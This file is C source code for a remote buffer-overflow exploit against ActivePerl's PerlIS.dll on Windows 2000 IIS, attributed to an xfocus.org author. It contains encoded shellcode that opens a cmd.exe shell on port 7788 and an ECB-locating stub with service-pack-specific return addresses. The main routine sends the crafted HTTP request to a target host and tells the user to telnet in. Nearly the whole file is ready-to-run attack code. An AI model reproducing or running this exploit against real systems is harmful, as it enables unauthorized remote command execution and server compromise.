/* 
ActivePerl PerlIS.dll buffer overflow exploit 
the hole found by NSFOCUS 
exploit code by isno@xfocus.org 
http://xfocus.org 
tested on win2k+sp0+Activestate ActivePerl 5.6.1.629 
---------------------------------------------------------- 
| ... ... ... | EIP | ... ... ... |     SEH     | ... ... 
---------------------------------------------------------- 
|_buffer                          |jmpfwd|callebx|findecb 
*/ 
#include <windows.h> 
#include <winsock.h> 
#include <stdio.h> 

#pragma comment (lib,"Ws2_32") 

//define the PERL ISAPI name, maybe ".cgi?" 
#define CGINAME ".pl?" 

//shellcode spawns a cmd.exe shell on port 7788 
//suit all WIN2K/NT system 
unsigned char shellcode[] = 
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90" 
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa" 
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36" 
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97" 
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14" 
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2" 
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14" 
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5" 
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1" 
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16" 
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68" 
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1" 
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94" 
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4" 
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68" 
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57" 
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4" 
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4" 
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5" 
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68" 
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67" 
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1" 
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf" 
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab" 
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0" 
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4" 
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0" 
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56" 
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7" 
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57" 
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4" 
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f" 
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7" 
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68" 
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f" 
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75" 
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0" 
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5" 
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2" 
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6" 
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97" 
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc" 
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb" 
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97" 
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2" 
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4" 
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97" 
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2" 
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97" 
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97" 
"\x68\x68\x68\x68"; 

/* 
jump to ECB->QUERY_STRING 
sub ebx,394h 
mov esp,ebx 
pop eax 
add eax,64h 
mov esp,eax 
pop eax 
push eax 
ret 
*/ 
//the code must suit the URL encoding, 
//for this reason,many ASM code cannot be used, 
//it is really difficult to work out thiz 
unsigned char findecb[]= 
"\x90\x83\xeb\x7e\x90\x83\xeb\x7e\x90\x83\xeb\x7e\x90\x83\xeb\x7e" 
"\x90\x83\xeb\x7e\x90\x83\xeb\x7e\x90\x83\xeb\x50\x90\x83\xeb\x50" 
"\x90\x8b\xe3\x90\x90\x90\x90\x90\x58\x83\xc0\x64\x90\x8b\xe0\x90" 
"\x90\x90\x90\x90\x58\x50\xc3"; 

//call ebx must suit URL encoding too 
//common jmpebx&callebx cannot be used 
unsigned char callebx0[]="\x33\x45\xaa\x77"; 
unsigned char callebx2[]="\x61\x62\x55\x88"; 
unsigned char jmpforward[]="\xeb\x06"; 

void usage(char *pgm); 

int main(int argc, char *argv[]) 
{ 
    unsigned char buff[4096]; 
    unsigned char sendbuff[4096]; 

    int shellcodelen; 
    int i,s; 
    int sptype = 0; 
    unsigned short int webport = 80; 
         
    struct hostent *ht; 
    struct sockaddr_in sin; 

    WSADATA WSAData; 
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) 
    { 
        printf("WSAStartup failed.\n"); 
        WSACleanup(); 
        exit(1); 
    } 

    if(argc < 2 || argc > 3) 
    { 
        usage(argv[0]); 
    } 
    if(argc == 3) 
        sptype = atoi(argv[2]); 
    if((ht = gethostbyname(argv[1])) == 0) 
    { 
        printf("Unable to resolve host %s\n",argv[1]); 
        exit(1); 
    }   

    sin.sin_port = htons(webport); 
    shellcodelen=strlen(shellcode); 

    memset(buff,0x90,sizeof(buff)); 
    memcpy(buff,"/cgi-bin/",9); 
    memcpy(buff+404-4,jmpforward,2); 
    if(sptype == 0) 
        memcpy(buff+404,callebx0,4); 
    else 
        memcpy(buff+404,callebx2,4); 
    memcpy(buff+404+4,findecb,strlen(findecb)); 
    memcpy(buff+404+4+64,CGINAME,strlen(CGINAME)); 
    memcpy(buff+404+4+64+strlen(CGINAME),shellcode,shellcodelen+1); 

    memset(sendbuff,0,4096); 
    _snprintf(sendbuff,4096,"GET %s HTTP/1.0\r\n\r\n",buff); 
    sin.sin_family = AF_INET; 
    sin.sin_addr = *((struct in_addr *)ht->h_addr); 
    if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
    { 
        printf("Unable to set up socket\n"); 
        exit(1); 
    }         
    if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1) 
    { 
        printf("Unable to connect\n"); 
        exit(1); 
    } 
    else 
        printf("Connected...\n"); 
    Sleep(1000); 
    printf("send shellcode...\n"); 
    if(send(s, sendbuff, strlen(sendbuff), 0) == -1) 
    { 
        printf("Unable to send\n"); 
        exit(1); 
    } 
    Sleep(1000); 
    i=1; 
    ioctlsocket(s,FIONBIO,&i); 
    memset(sendbuff,0,sizeof(sendbuff)); 
    recv(s,sendbuff,1024,0); 
    if(strstr(sendbuff,"404")!=NULL) 
    { 
        printf("the target is not vulnerable\n"); 
        closesocket(s); 
        return 1; 
    } 
    closesocket(s); 
    printf("all done!\nyou can telnet %s 7788\n",argv[1]); 

    return 0; 
} 

void usage(char *pgm) 
{ 
    printf("Usage: %s <hostname> [SP]\n", pgm); 
    printf("  SP: Service Pack (0 or 2, default is 0)\n"); 
    printf("example: %s 127.0.0.1 2\n", pgm); 
    exit(1); 
}